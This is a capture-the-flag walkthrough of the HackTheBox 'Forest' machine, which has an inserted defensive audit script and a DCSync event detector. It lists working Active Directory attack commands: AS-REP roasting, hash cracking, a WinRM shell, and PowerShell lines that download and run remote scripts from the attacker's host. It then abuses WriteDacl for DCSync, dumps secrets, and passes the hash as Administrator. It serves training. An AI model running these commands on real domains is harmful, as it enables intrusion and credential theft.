HackTheBox — Forest Walkthrough

Mainul Hasan
9 min read · Nov 1, 2020
Forest
Info Card

Summary

This is a write-up for Forest, an easy Windows box on hackthebox.eu. It was unique in the sense that there was no web application as an attack surface. We exploit a null session to obtain the hash of a user, crack it, and use the password to get a shell on the box. From that shell we run BloodHound to find a path to escalate our account's privileges, use that path to dump the domain secrets, and with those secrets log in to the box as Administrator.

Recon

As usual, we start with nmap (the IP might be different for you):

ports=$(nmap -p- --min-rate=1000 -T4 10.129.1.77 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.129.1.77

Looking at the results, we can see that multiple ports are open:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-31 11:27 EDT
Nmap scan report for 10.129.1.77
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-31 15:36:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49748/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/31%Time=5F9D8276%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h28m49s, deviation: 4h02m30s, median: 8m48s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-10-31T08:38:59-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-10-31T15:38:58
|_ start_date: 2020-10-31T15:20:47
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.87 seconds

We will start with SMB, running smbclient to list shares:

smbclient -L 10.129.1.77

We can see that the anonymous login was successful but no shares were listed.

smbclient output

We move on to rpcclient to check whether we can enumerate users on the box. We will try to authenticate via a null session.

Funny thing: null authentication allows enumerating domains as well as users. It was standard functionality in Windows Server 2003 and 2008. On later versions it is removed on a fresh installation, but on an upgrade from an earlier version of Windows Server the functionality does not get disabled, as users might still depend on it.

rpcclient -U '' 10.129.1.77

And we get a session.

rpcclient output

Let’s enumerate users:

enumdomusers
userlist gathered via rpcclient

We can see there are a few users that could be useful:

Administrator
sebastien
lucinda
svc-alfresco
andy
mark
santi

You can observe that we removed a large portion of the users, mostly because those are default accounts or accounts created by programs, so they would not have been useful had we performed a brute-force against the box.

Among the users, svc-alfresco looks like a service account; we are guessing that from the naming convention. We can confirm this in rpcclient by running the following queries:

queryusergroups 0x47b
querygroup 0x47c
querygroup 0x201
checking user groups for svc-alfresco

As we move on, we do not have anything solid on the box yet, so we will use the impacket tools, starting with GetNPUsers.py. It finds all users that do not require Kerberos pre-authentication and requests an AS-REP (TGT response) for each of them; the part of that response encrypted with the user's password hash can then be cracked offline.

We copy the script to our working directory and run the command:

python3 GetNPUsers.py -dc-ip 10.129.1.77 -request 'htb.local/' -format hashcat

And we get a user account dumped. We specify the format as hashcat so that we can use the dump directly in hashcat.

GetNPUsers.py output
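What GetNPUsers.py is looking for is the DONT_REQ_PREAUTH bit (0x400000) in each account's userAccountControl attribute. The audit below is an added example (not part of the write-up and not impacket code) showing how a domain owner can find the same exposure from their own directory data before anyone else does: decode the attribute, list the exempt accounts, and compute the corrected value. The account records are constructed for this example; the attribute name, flag values and LDAP matching-rule OID are the real Active Directory ones.

```python
# Added example: audit userAccountControl for accounts that do not require
# Kerberos pre-authentication. Such an account returns an AS-REP encrypted
# with its own password hash to anyone who asks for it, which is the
# "$krb5asrep$" material the write-up cracks with hashcat.
# Account records below are constructed for this example.

# Commonly seen userAccountControl bits (subset).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# LDAP filter for the same condition (1.2.840.113556.1.4.803 is the bitwise-AND rule).
PREAUTH_EXEMPT_FILTER = "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"


def decode_uac(value):
    """Names of the flags set in a userAccountControl value, lowest bit first."""
    value = int(value)
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def preauth_exempt(accounts, include_disabled=False):
    """sAMAccountNames whose AS-REP can be obtained without pre-authentication.

    Disabled accounts are skipped by default: the KDC will not issue them a
    ticket, so they are not exposed until someone re-enables them.
    """
    names = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])  # ldapsearch prints it as a string
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        names.append(acct["sAMAccountName"])
    return sorted(names)


def clear_preauth_exemption(uac):
    """The userAccountControl value to write back to remove the exemption."""
    return int(uac) & ~DONT_REQ_PREAUTH


# Constructed records; names and values are hypothetical.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-report", "userAccountControl": 0x400200},
    {"sAMAccountName": "j.doe", "userAccountControl": 0x10200},
    {"sAMAccountName": "old-svc", "userAccountControl": 0x400202},   # exempt but disabled
    {"sAMAccountName": "svc-print", "userAccountControl": "4260352"},  # 0x410200 as ldapsearch prints it
]

if __name__ == "__main__":
    for acct in SAMPLE_ACCOUNTS:
        print(f"{acct['sAMAccountName']:<12} {', '.join(decode_uac(acct['userAccountControl']))}")
    print("pre-auth exempt and enabled:", preauth_exempt(SAMPLE_ACCOUNTS))
    print("including disabled:", preauth_exempt(SAMPLE_ACCOUNTS, include_disabled=True))
```

Run the LDAP filter with any directory client (or `Get-ADUser -Filter` / `Set-ADAccountControl -DoesNotRequirePreAuth $false` in the AD PowerShell module) and the list should come back empty; when an application genuinely needs the exemption, a long random password makes the offline crack the write-up performs impractical.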

Now that we have a user and its hash, let’s see if we can crack the hash and get into the box.

Initial Foothold

Let’s run hashcat (mode 18200 is Kerberos 5 AS-REP etype 23):

hashcat -m 18200 forest-hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule

Looking at the results, we can see that the password has been cracked and it is ‘s3rvice’.

hashcat output

We have already seen in the nmap output that port 5985 (WinRM) is open, so we can try to get a shell over WinRM. We will use evil-winrm to connect:

evil-winrm -i 10.129.1.77 -u svc-alfresco -p s3rvice

And we get a shell.

initial shell

Enumeration

We have a low-privilege service account on the system, so we need to escalate our privileges.

We will start with BloodHound. To do this we host an HTTP server to load the SharpHound script on the victim's machine, and create an SMB share so that we can copy the BloodHound output back to our local machine.

Let’s start the Python HTTP server:

sudo python3 -m http.server 80

Next, let’s create the SMB share on our local machine using impacket-smbserver:

sudo impacket-smbserver tmp $(pwd) -smb2support -user miku -password password

Now we have to create a new PSDrive to connect to the share; for that we need to put the password in a credential object. We run the following commands in the shell:

$pass = convertto-securestring 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('miku', $pass)

Now, to connect:

New-PSDrive -Name miku -PSProvider FileSystem -Credential $cred -Root \\10.10.14.41\tmp

From the output we can confirm our PSDrive was created.

PSDrive Created

Let’s load the script on the victim’s machine and run it:

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.41/SharpHound.ps1')
Invoke-BloodHound -CollectAll

After SharpHound finishes we will have a zip file containing the results. We copy this file to the PSDrive:

cd miku:
xcopy 'C:\Users\svc-alfresco\Documents\20201031104759_BloodHound.zip' .

We now need to run BloodHound and check for paths to escalate our privileges.

First we start the neo4j console, then BloodHound itself.

First console:

neo4j console

Second console:

bloodhound
starting BloodHound

We now drop the zip file into the BloodHound window and it is analyzed after a short while.

Once the zip file has been analyzed, let’s find our user and mark it as owned.

marking svc-alfresco as owned

Looking for paths, we start from Shortest Paths from Owned Principals. It shows that svc-alfresco is a member of Service Accounts; Service Accounts is a member of Privileged IT Accounts, which is a member of Account Operators; Account Operators is a member of Exchange Windows Permissions; and Exchange Windows Permissions has WriteDacl on HTB.LOCAL.

BloodHound Path

The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.

Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights.

Privilege Escalation

We can abuse WriteDacl on the domain object to grant us DCSync rights on HTB.LOCAL.

To abuse this we first create a new user, in order to keep the current account safe in case we ever need it. To create a user:

net user miku miku@123 /add /domain

Now we add it to the Exchange Windows Permissions group:

net group "Exchange Windows Permissions" /add miku

Now, with the help of PowerView, we abuse the WriteDacl. PowerView is part of PowerSploit, which can be downloaded from GitHub. We copy the PowerView.ps1 script to our web server directory and again load it in the remote shell:

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.41/PowerView.ps1')

We again create a credential object, this time for the user we created:

$pass = convertto-securestring 'miku@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\miku', $pass)

Now we run the following command to grant DCSync rights to our account:

Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity miku -Rights DCSync
getting DCSync rights

Once we have the rights, we dump the secrets from the machine and use them to log in as Administrator.

To dump the secrets we use another impacket tool, secretsdump.py. If it runs successfully, that means our rights were assigned correctly and the secrets get dumped:

python3 secretsdump.py htb.local/miku:miku@123@10.129.1.77

Looking at the output, quite a lot of secrets were dumped.

secrets dumped
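Everything from the Privilege Escalation section onwards leaves a trail in the domain controller's Security log: a user is created (event 4720), added to a privileged group (4728, 4732 or 4756 depending on group scope; Exchange Windows Permissions is a universal group), and then exercises the two replication control-access rights that DCSync needs (event 4662 with the DS-Replication-Get-Changes GUIDs in its Properties field). The detector below is an added example from the defender's side, not part of the write-up; the events it processes are constructed for this example, while the event IDs and rights GUIDs are the real Windows/Active Directory values. The only assumption is the set of domain-controller machine accounts, taken here as FOREST$ from the scan results.

```python
import re

# Added example: spot the account-creation -> privileged-group -> DCSync chain
# in Windows Security events. Event records are constructed for this example.

# Control-access right GUIDs that DCSync (replication) requires on the domain object.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# Groups whose membership changes deserve a look (extend to taste).
SENSITIVE_GROUPS = {"Exchange Windows Permissions", "Account Operators", "Domain Admins"}
# Member added to security-enabled global / local / universal group.
GROUP_ADD_EVENTS = {4728, 4732, 4756}
GUID = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


def replication_rights(properties):
    """Replication rights named in a 4662 Properties field (case-insensitive)."""
    return [REPLICATION_RIGHTS[g] for g in GUID.findall(properties.lower()) if g in REPLICATION_RIGHTS]


def analyze(events, dc_accounts):
    """Return (severity, message) alerts for the suspicious events in order."""
    alerts = []
    for e in events:
        eid, who = e["EventID"], e["SubjectUserName"]
        if eid == 4720:
            alerts.append(("low", f"account {e['TargetUserName']} created by {who}"))
        elif eid in GROUP_ADD_EVENTS and e["TargetUserName"] in SENSITIVE_GROUPS:
            alerts.append(("high", f"{e['MemberName']} added to {e['TargetUserName']} by {who}"))
        elif eid == 4662:
            rights = replication_rights(e.get("Properties", ""))
            # Domain controllers replicate with each other all day; anyone else is news.
            if rights and who not in dc_accounts:
                alerts.append(("critical",
                               f"{who} used {', '.join(rights)} on {e['ObjectName']} (possible DCSync)"))
    return alerts


DC_ACCOUNTS = {"FOREST$"}  # assumption: machine account of the DC named in the scan

# Constructed events mirroring the chain in the write-up, plus two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 4720, "SubjectUserName": "svc-alfresco", "TargetUserName": "miku"},
    {"EventID": 4756, "SubjectUserName": "svc-alfresco", "TargetUserName": "Exchange Windows Permissions",
     "MemberName": "CN=miku,CN=Users,DC=htb,DC=local"},
    {"EventID": 4732, "SubjectUserName": "svc-alfresco", "TargetUserName": "Remote Desktop Users",
     "MemberName": "CN=miku,CN=Users,DC=htb,DC=local"},                      # benign: not a sensitive group
    {"EventID": 4662, "SubjectUserName": "FOREST$", "ObjectName": "DC=htb,DC=local",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},  # benign: DC replication
    {"EventID": 4662, "SubjectUserName": "miku", "ObjectName": "DC=htb,DC=local",
     "Properties": "Control Access\n\t{1131F6AA-9C07-11D1-F79F-00C04FC2DCD2}\n\t{1131F6AD-9C07-11D1-F79F-00C04FC2DCD2}"},
    {"EventID": 4662, "SubjectUserName": "miku", "ObjectName": "CN=miku,CN=Users,DC=htb,DC=local",
     "Properties": "Read Property\n\t{00000000-0000-0000-0000-000000000000}"},  # placeholder GUID, not a replication right
]

if __name__ == "__main__":
    for severity, message in analyze(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"[{severity:<8}] {message}")
```

The 4662 events only exist if "Audit Directory Service Access" is enabled and the domain object's SACL audits control access; the Add-DomainObjectAcl step itself shows up as event 5136 (directory object modified) on the domain's nTSecurityDescriptor, which is the earliest point at which this chain can be caught.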

Now we use crackmapexec to check whether the dumped Administrator hash lets us authenticate. To do that, run:

crackmapexec smb 10.129.1.77 -u administrator -H aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

It shows Pwn3d!, which means we can get a shell with this account.

crackmapexec output

We use another impacket tool, psexec.py, to connect to the machine:

python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.129.1.77

Voila! We get a shell back; running “whoami” shows that we have the shell as “nt authority\system”.

nt authority\system

Flags

type root.txt
f048153f202bbb2f82622b04d...9cc
type C:\Users\svc-alfresco\Desktop\user.txt
e5e4e47ae7022664cda6eb013...9ed
Trophy

Hope you liked this write-up on Forest from hackthebox. Comments and Claps are appreciated.

~m1kU
